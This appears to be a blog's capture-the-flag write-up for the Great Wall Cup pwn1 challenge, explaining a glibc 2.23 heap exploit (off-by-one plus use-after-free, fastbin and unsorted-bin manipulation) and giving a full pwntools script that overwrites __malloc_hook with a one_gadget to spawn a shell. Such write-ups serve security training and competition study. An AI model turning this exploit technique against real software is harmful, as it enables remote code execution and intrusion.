长城杯 (Great Wall Cup) pwn1

The challenge has an off-by-one and a UAF vulnerability.

We can use brute force: partially overwrite the low bytes to point at malloc_hook-0x23, and change the fd of the fastbin chunk to point at the unsortedbin chunk.

That way the next allocation pulls this unsortedbin chunk into the fastbin.

We only need to modify the fd pointer of this unsortedbin chunk for it to take effect: overwrite its low bytes to malloc_hook-0x23.

Then use the off-by-one to change the unsortedbin chunk's size to a fastbin size.

Two consecutive allocations then give us a libc pointer in the heap array.

Next, set the unsortedbin chunk's fd to 0 and its bk to __memalign_hook (at malloc_hook-0x10).

Then use the off-by-one again to restore the unsortedbin chunk's size.

Allocate a chunk of the same size as the unsortedbin chunk to restore it, otherwise the checks cannot be passed.

Finally use a one_gadget on malloc_hook.

Exploitation

```
# malloc does not satisfy the one_gadget trigger conditions
# malloc_printerr triggers malloc_hook
```

The double free at the end then triggers it.

exp

```python
from pwn import *
import time
# context.log_level = 'debug'

local = 1
libc_path = '/home/q/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
target = ''.split(':')          # remote host:port, left blank in the original
target_libc = ''
ogg = [0xf03a4, 0xf1247]        # one_gadget offsets for this libc

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def add(idx, size):
    sa(b'>> \n', b'1')
    sa(b'input index:\n', str(idx).encode())
    sa(b'input size:\n', str(size).encode())

def edit(idx, con):
    sa(b'>> \n', b'3')
    sa(b'input index:\n', str(idx).encode())
    sla(b'input context:\n', con)

def free(idx):
    sa(b'>> \n', b'2')
    sa(b'input index:\n', str(idx).encode())

if local:
    p = process('./pwn')
    libc = ELF(libc_path)
else:
    p = remote(target[0], target[1])
    libc = ELF(target_libc)

# hidden menu option 666 leaks the address of printf
sa(b'>> \n', b'666')
base = int(rud(b'\n'), 16) - libc.sym['printf']
malloc_hook = base + libc.sym['__malloc_hook']
m_hook = malloc_hook & 0xff
success(hex(m_hook))

add(0, 0x68)   # chunk 0: fastbin size 0x70
add(1, 0xe0)   # chunk 1: size 0xf0, goes to the unsorted bin when freed
add(2, 0x60)   # chunk 2: fastbin size 0x70
free(0)
free(2)
free(0)        # double free: fastbin 0x70 is 0 -> 2 -> 0
free(1)        # chunk 1 lands in the unsorted bin
edit(1, b'\xed\x1a')   # low bytes of chunk 1's fd -> malloc_hook-0x23
#gdb.attach(p)
edit(0, b'\x70\x80')   # low bytes of chunk 0's fd -> chunk 1 (the brute-forced part)
#gdb.attach(p)
add(3, 0x68)   # 0 and 3 are the same chunk
#gdb.attach(p)

edit(3, b'a'*0x68 + b'\x71')   # off-by-one: shrink chunk 1's size to 0x71
#gdb.attach(p)

add(4, 0x68)   # 1 and 4 are the same chunk
add(5, 0x68)   # malloc_hook-0x23
#gdb.attach(p)

edit(1, p64(0) + b'\x00')   # fd = 0, bk -> __memalign_hook (malloc_hook-0x10)
#gdb.attach(p)
edit(0, b'a'*0x68 + b'\xf1')   # off-by-one: restore chunk 1's size to 0xf1
#gdb.attach(p)
add(6, 0xe0)   # take chunk 1 back out of the unsorted bin
#gdb.attach(p)
one = base + ogg[0]
pl = b'a'*19 + p8(one & 0xff) + p8((one >> 8) & 0xff) + p8((one >> 16) & 0xff)
edit(5, pl)    # write the low 3 bytes of the one_gadget into __malloc_hook
#gdb.attach(p)
free(0)
free(0)        # double free -> malloc_printerr -> __malloc_hook
shell()
```

  • Copyrights © 2021-2023 H.greed